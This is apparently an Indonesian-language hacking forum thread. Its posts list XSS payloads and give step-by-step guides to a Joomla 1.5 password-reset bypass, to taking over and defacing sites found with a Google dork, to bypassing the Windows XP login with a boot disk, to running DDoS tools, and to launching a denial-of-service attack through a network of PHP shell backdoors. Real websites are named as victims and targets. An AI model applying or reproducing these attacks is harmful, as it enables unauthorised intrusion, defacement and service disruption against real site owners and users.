Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]TABLE (who would have thought tables were XSS targets... except me, of course):
<TABLE BACKGROUND="javascript:alert('XSS')">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]TD (just like above, TD's are vulnerable to BACKGROUNDs containing JavaScript XSS vectors):
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]DIV background-image:
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz as a vulnerability in Hotmail:
<DIV STYLE="background-image:07507206C028'06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029'029">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
Posted 3 months ago # - XSS
-
UNTUK JOMBLAH
Hai Ketemu Lagi ini tutorial buat pengetahuan aja. Soalnya Kebanyakan orang sudah memperbaiki kesalahan pada codingan ini, namun bukan menutup kemungkinan bagi pembuat website pemula yang menggunakan Joomla 1,5,0 – 1,5,4 << versi ini yang memiliki bugs untuk versi diatasnya sudah diperbaiki oleh development Team Joomla..
Langsung aja ya..1.masuk k http://www.google.com
2.klik/search inurl:option=com_user daerah tujuancontoh: inurl:option=com_user pekan baru untuk mencari bugs bisa di http://www.milw0rm.com atau http://www.darkc0de.com search aja Joomla
3. misalkan dapet korban
http://konsultasimuamalat.com/home/index.php?option=com_user&task=registerlihat warna yang biru akan di ganti dengan
option=com_user&view=reset&layout=confirm
jadi penulisannya...
http://konsultasimuamalat.com/home/index.php?option=com_user&view=reset&layout=confirm
nah di situ akan keluar token
token tersebut di isi dengan tanda....
' Single Quote <----------- kenapa single quote??.. itu buat membuat bingung SQL karen menerima query dengan value seperti itu.terus kalo berhasil km akan di bawa menuju
tempat mengisi password baru dan konfirmasi password baru....Ada dua textbox nah itu buat ganti passnnya inget ke 2-2 textbox mesti sama isinya..
isi lah dengan sesuka hati.....
lanjut...................
langah berikutnya
setelah di berhasil isi pass tersebut anda harus login lagi dengan nama/ username
Admin kenapa admin? Karena pada saat kita menginstal joomla ID admin itu terbuat dengan otomatis kecuali orang yang expert tahu cara mengganti passnya.nah kalo passwordnya yaitu adalah password yang baru anda buat tadi yang di isi di 2 text box tadi.....
lalu dimana admin loginnya?? Hihi defaultnya udah pasti http://www.namasite.com/administrator/
masuk ke bagian tempeate kalo g salah adanya di extension...
nah untuk deface depannya ganti templatenya dengan mencentang template lalu klik edit html, tapi kalau ingin deface full, upload skin baru dan hapus skin dia kalau pengen ambil alih webnya masukan evilcode aja caranya ada banyak, dengan menyisipkannya di skin/dimodule yah banyak lah intinya..anda juga bisa masuk kesitenya sebagai admin dah mengedit web dari front – site
atau seperti diatas admin – siteDah beres lagi deh 1 tutorial saya
Maaf ya kalo gak berguna hahaha...Posted 3 months ago # -
CARA SETING AOL 9.1 UNTUK MEMBUAT PROXSY
1. Download Software AOL 9.1 di situs berikut dan install software tersebut
http://rapidshare.com/files/134285112/AOL_9.1.rar
2. Setelah proses instalasi selesai, buka AOL 9.1 anda lalu pilih menu Connect Options
3. Setelah anda pilih menu Connect Options, maka akan tampil gambar seperti di bawah ini, pilih lagi menu Advanced Setting ( Pojok kiri Bawah ).
4.Setelah itu akan tampil seperti gambar di bawah ini, lalu pilih Tab Broadband dan klik tulisan Add a Broadband Profile dan tulis profile terserah anda, lalu klik add.
5. Setelah itu di menu Connection Type pilih Home Network lalu save.
6. Setelah itu akan tampil seperti gambar di bawah ini, Screen Name pilih New User, Connection di pilih nama koneksi yang anda buat tadi ( Langkah 4 ) lalu klik Sign ON
7. Setelah itu akan tampil seperti gambar di bawah ini, centang pilihan “You already have an AOL Screen Name and Password”, lalu masukkan username dan password ( ini adalah username dan password email AOL anda ) lalu klik Next, jika anda belum punya anda bisa mendaftar email di situs http://webmail.aol.com/ secara gratis.
8.setalah selesai nanti akan muncul gambar lalu buka Firefox atau Internet Explorer anda
9.Buka Firefox atau Internet Explorer anda dan coba masuk ke situs http://www.cmyip.com, maka otomatis IP anda akan berubah mengikuti IP yg di miliki oleh AOL.(Ingat AOL anda jangan ditutup ataupun di disconnect, jika anda menutup/disconnect AOL maka otomatis IP anda akan kembali seperti semula )
*. AOL ini berguna sebagai VPN ( Virtual Private Network ) dalam arti apapun software anda ( Contoh : Firefox, Internet Explorer, MIRC, ataupun YM ) yang melakukan koneksi ke internet, secara otomatis langsung menggunakan IP dari AOL tersebut selama software AOL anda masih Sign On.Posted 3 months ago # -
CARA HACKING WINDOS XP TANPA MENCARI PASWORD ADMIN
Windows menerima password lagi.
There is a far better way to get into Windows XP. Ada cara yang jauh lebih baik untuk masuk ke Windows XP. It is easy and it does not reset the password. Mudah dan tidak me-reset password. Hack into a computer running Windows XP without changing the password and find out all and any passwords on the machine (including admin accounts). Hack ke komputer yang menjalankan Windows XP tanpa mengubah password dan mencari tahu semua dan password di mesin (termasuk admin account).nah ini gw dapetnya dalam berbahasa inggris
1. Get physical access to the machine. Dapatkan akses fisik ke komputer. Remember that it must have a CD or DVD drive. Ingat bahwa ia harus memiliki drive CD atau DVD.
2. Download DreamPackPL HERE . 2. Download DreamPackPL HERE.
3. 3. Unzip the downloaded dpl.zip and you'll get dpl.ISO. Unzip download dpl.zip dan Anda akan mendapatkan dpl.ISO.
4. 4. Use any burning program that can burn ISO images. Menggunakan program yang terbakar bisa membakar ISO images.
5. 5. After you have the disk, boot from the CD or DVD drive. Setelah Anda memiliki disk, boot dari CD atau DVD drive. You will see Windows 2000 Setup and it will load some files. Anda akan melihat Windows 2000 Setup dan itu akan memuat beberapa file.
6. 6. Press “ R ” to install DreamPackPL. Tekan "R" untuk menginstal DreamPackPL.
7. 7. Press “ C ” to install DreamPackPL by using the recovery console. Tekan "C" untuk menginstal DreamPackPL dengan menggunakan konsol pemulihan.
8. 8. Select the Windows installation that is currently on the computer (Normally is “1″ if you only have one Windows installed) Pilih penginstalan Windows yang saat ini di komputer (Biasanya adalah "1" jika Anda hanya memiliki satu Windows yang diinstal)
9. 9. Backup your original sfcfiles.dll by typing: Backup sfcfiles.dll asli Anda dengan mengetikkan:
“ ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld ” (without quotes) "Ren C: \ Windows \ System32 \ sfcfiles.dll sfcfiles.lld" (tanpa tanda kutip)
10. 10. Copy the hacked file from CD to system32 folder. Copy hacked file dari CD ke folder system32. Type: Type:
“ copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll ” (without quotes and assuming your CD drive is D:) "Copy D: \ i386 \ pinball.ex_ C: \ Windows \ System32 \ sfcfiles.dll" (tanpa tanda kutip dan dengan asumsi CD drive D:)
11. 11. Type “exit”, take out disk and reboot. Ketik "exit", mengambil disk dan reboot.
12. 12. In the password field, type “ dreamon ” (without quotes) and DreamPack menu will appear. Dalam kolom password, ketik "dreamon" (tanpa tanda kutip) dan DreamPack menu akan muncul.
13. 13. Click the top graphic on the DreamPack menu and you will get a menu popup. Klik bagian atas DreamPack grafis pada menu dan Anda akan mendapatkan menu popup.
15. Type “god” in the password field to get in Windows. Ketik "dewa" di lapangan untuk mendapatkan password pada Windows.You can also go to Passwords and select “Logon with wrong password and hash”. Anda juga dapat pergi ke Sandi dan pilih "Logon dengan password yang salah dan hash". This option allows you to login with ANY password. Pilihan ini memungkinkan Anda untuk login dengan password APAPUN.
Note: I was unable to bring up the DreamPackPL for the first time because I have Kaspersky Anti-Virus already running in background. Catatan: Saya tidak mampu untuk membuka DreamPackPL untuk pertama kalinya karena saya telah Kaspersky Anti-Virus sudah berjalan di latar belakang. I believe most antivirus already labelled this tool as a Hack-Tool. Aku percaya sebagian besar antivirus tool ini sudah dicap sebagai Hack-Tool. A Hack-Tool is NOT a virus. Seorang Hack-Tool TIDAK virus. DreamPackPL helps you bypass the Windows Login screen and it is not destructive. DreamPackPL membantu Anda melewati Windows Login layar dan tidak merusak.
Posted 3 months ago # -
ok saya akan membahas tentang menggunakan ddos, sara rasa cara menggunakan ddos sangat gampang:
pertama download ddos dari web mana aja yg qm suka.. kalo bisa cari ddos pro
jadi lu gak repot menggunakannya cari ddos yg simpel ja kalo gw si make ddos pro itu juga dapet sofware dari temen nah pertama2 siapkan ddos yg udah qm download trus masukin IP terget di kolom pertama kalo udah baru klik ok trus masukin port yg akan di serang pada ip target tersebut... selama pengoprasian ddos qm akan mengalami yg namanya lemot atau lag lag lag hahaha tandanya musuh tewas angka2 akan berhenti bergerak trus stop nah koneksi qm akan kembali normal kalo blom reset router nya inget yg menggunakan ddos ini d sarankan unlimited ya jangan yg limited entar lu tewas duluan nah untuk memeriksa port target qm bisa mecari sofware nmpas atau putty atau apa lah serah qm yg penting bisa mencari port sang target ok.maaf soal kenapa saya tidak menaroh link buat download ddos soalnya ddos lom ada obatnya sampe sekarang entar lu jahilin gw lagi hwuakakaka dan ddos juga ada macam2 ada buat web dan ada buat persolal maksudnya nembak ip gitu tapi pada intinya ddos itu nembak ip orang hwuakakaka untuk web pun kita harus cari ip ya heheehehe di indowebster juga ada koq ddos cari aja ^^ tapi saya kira ddos di indowebster itu susah karna menggunkan bhs yg lom ada di kamus gw huwakakaka ok coi selamat mencoba
Posted 3 months ago # -
Teknik Remote Dos Exploit Khusus
yup kali ini ane share sedikit exploit racikan ane khusus utk remote dos exploit
. sebagai sample khusus utk uji coba targetnya adl http://www.bsi.ac.id/ (remote dos exploit ini udah khusus dirancang utk server uji coba)ok pertama 2 yg diperlukan adl minimal 15-20 php shell backdoor dg safe mode off dan socket bisa jalan.
download dulu remote dos exploitnya di sini:
http://www.slbbalikpapan.net/images/dos_exploit.rar (khusus bwt bsi.ac.id , jika ingin mengganti target silahkan edit file .sh , nama web diganti nama web,port diganti dgn port)ok kalo udah didownload langsung aja upload dos_exploit.rar ke php shell backdoor kita, setelah itu jalankan perintah shell:
agar semua php shell tadi bisa dikontrol oleh anda, ekstrak dos_exploit.rar tadi di komputer anda,ketik: unrar e dos_exploit.rar
setelah itu semuanya akan terekstrak ke direktori dos_exploit
misal alamat shell bd anda: http://zombie.com/shell_anda.php
setelah diekstrak maka akan tercipta dir dos_exploit dg php shell kecil utk menjalankan remote dos exploit:
jadi misal:
http://zombie.com/dos_exploit/sh.php?cmd=
di mana semua remote dos exploit ada di dir dos_exploit
lalu save semua list 2 zombie 2 yang udah siap tersebut di file dg nama z.txt di komputer anda
misal isi file z.txt:
http://zombie.com/dos_exploit/sh.php?cmd=
http://zombie1.com/dos_exploit/sh.php?cmd=
http://zombie2.com/lokasi_shell/dos_exploit/sh.php?cmd=
ddst...buat list minimal anda perlu 15 (lebih banyak lebih bagus)
ok setelah semua remote dos exploit terpasang, anda run di komputer lokal anda exploit 2 nya(harus ada perl interpreter),
ketikkan perintah2 ini dari ms dos atau shell di direktori dos_exploit di komputer anda:
perl rm.pl
perl z0.pl
perl z1.pl
perl z2.pl
perl z3.pl
perl z4.pl
perl z5.plketerangan
semuanya adl remote dos controller utk tiap shell yg telah anda pasang.
di mana z0.pl di komputer lokal berguna menjalankan exploit z0.sh di tiap zombie anda,
di mana z1.pl di komputer lokal berguna menjalankan exploit z1.sh di tiap zombie anda,
di mana z2.pl di komputer lokal berguna menjalankan exploit z2.sh di tiap zombie anda,
di mana z3.pl di komputer lokal berguna menjalankan exploit z3.sh di tiap zombie anda,
di mana z4.pl di komputer lokal berguna menjalankan exploit z4.sh di tiap zombie anda,
di mana z5.pl di komputer lokal berguna menjalankan exploit z5.sh di tiap zombie anda,ok setelah semua anda run silahkan tunggu beberapa menit maka server target uji coba kita di http://www.bsi.ac.id/ akaan seperti ini jika anda berhasil:
selamat mencoba,,
Posted 3 months ago #
Reply »
You must log in to post.